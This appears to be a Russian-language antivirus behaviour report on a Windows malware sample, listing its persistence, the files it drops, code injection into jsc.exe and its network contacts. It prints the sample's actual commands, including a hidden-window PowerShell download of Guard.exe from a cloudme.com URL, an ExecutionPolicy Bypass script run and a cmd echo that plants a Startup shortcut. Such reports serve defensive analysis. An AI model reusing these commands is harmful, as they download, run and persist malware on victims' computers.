Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\swiftwrite.url
Вредоносные функции
Внедряет код в
следующие пользовательские процессы:
- jsc.exe
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\guard.exe
- C:\users\public\publicprofile.ps1
- C:\users\public\secure.au3
- %LOCALAPPDATA%\wordgenius technologies\g
- %LOCALAPPDATA%\wordgenius technologies\swiftwrite.pif
- %LOCALAPPDATA%\wordgenius technologies\swiftwrite.js
- C:\users\public\jsc.exe
Сетевая активность
Подключается к
- 'my.##oudme.com':443
TCP
Другие
- 'my.##oudme.com':443
UDP
- DNS ASK my.##oudme.com
- DNS ASK nb##############bvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
- 'C:\users\public\guard.exe' C:\Users\Public\Secure.au3
- 'C:\users\public\jsc.exe'
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:usefullbox/:real_1/real" -OutFile "C:\Users\Public\Guard.exe"" (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /k echo [InternetShortcut] > "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="%LOCALAPPDATA%\WordGenius Technologies\SwiftWrite.js" >> "%APPDATA%\Microsoft\W...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" (со скрытым окном)
